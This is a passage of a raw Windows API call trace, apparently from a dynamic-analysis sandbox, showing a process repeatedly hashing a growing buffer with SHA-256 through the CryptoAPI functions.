dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.381] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.381] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x940, dwFlags=0x0) returned 1 [0119.381] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47690 [0119.382] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.382] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.382] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.382] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.382] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x960, dwFlags=0x0) returned 1 [0119.382] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e476c0 [0119.382] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.382] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.382] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.383] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.383] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x980, dwFlags=0x0) returned 1 [0119.383] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47a50 [0119.383] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.383] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.383] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.384] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.384] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0119.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47b70 [0119.384] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.384] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.384] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.384] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.384] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0119.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47600 [0119.384] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.394] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.394] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.394] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.394] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0119.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47900 [0119.394] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.394] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.394] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.395] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.395] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0119.395] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47570 [0119.395] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.395] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.395] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.395] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.396] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0119.396] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e476f0 [0119.396] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.396] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.396] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.396] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.396] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0119.396] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e478a0 [0119.396] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.396] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.396] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.397] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.397] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0119.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47c30 [0119.397] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.397] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.397] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.398] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.398] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0119.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47a80 [0119.398] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.398] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.398] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.398] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.398] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0119.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47ab0 [0119.398] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.398] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.398] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.399] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.399] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0119.399] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47bd0 [0119.399] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.399] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.399] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.400] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.400] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0119.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47b40 [0119.400] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.400] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.400] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.400] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.400] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0119.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47cc0 [0119.400] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.400] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.400] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.401] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.401] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0119.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47ba0 [0119.401] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.401] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.401] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.402] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.402] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0119.402] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47c60 [0119.402] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.402] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.402] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.402] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.402] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0119.402] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47720 [0119.403] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.403] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.403] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.403] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.403] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0119.403] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e475a0 [0119.403] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.403] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.403] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.404] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.404] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0119.404] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47540 [0119.404] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.404] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.404] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.405] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.405] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0119.405] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e477b0 [0119.405] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.405] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.405] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.405] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.405] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0119.405] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47c90 [0119.405] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.405] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.406] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.406] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.406] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0119.406] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47c00 [0119.406] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.406] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.406] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.407] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.407] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e479f0 [0119.407] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.407] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.407] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.407] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.407] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47ae0 [0119.408] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.408] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.408] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.408] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.408] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0119.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e478d0 [0119.408] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.408] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.408] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.409] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.409] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0119.409] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47810 [0119.409] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.409] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.409] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.409] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.409] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0119.410] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47960 [0119.410] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.410] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.410] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.410] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.410] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0119.410] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e475d0 [0119.410] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.410] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.410] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.411] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.411] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0119.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47750 [0119.411] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.411] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.411] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.411] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.411] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0119.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47630 [0119.412] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.412] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.412] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.412] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.412] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0119.412] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47660 [0119.412] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.412] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.412] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.413] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.413] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0119.413] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47780 [0119.413] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.413] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.413] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.414] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.414] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0119.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e477e0 [0119.414] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.414] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.414] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.414] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.414] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0119.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47840 [0119.415] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.415] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.415] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.415] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.415] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0119.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47870 [0119.415] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.415] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.415] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.416] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.416] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0119.416] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47990 [0119.416] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.416] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.416] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.416] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.416] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0119.417] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48200 [0119.417] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.417] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.417] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.417] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.417] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0119.417] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47fc0 [0119.417] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.417] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.417] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.418] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.418] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0119.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e484d0 [0119.418] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.418] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.418] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.419] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.419] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0119.419] RtlAllocateHeap 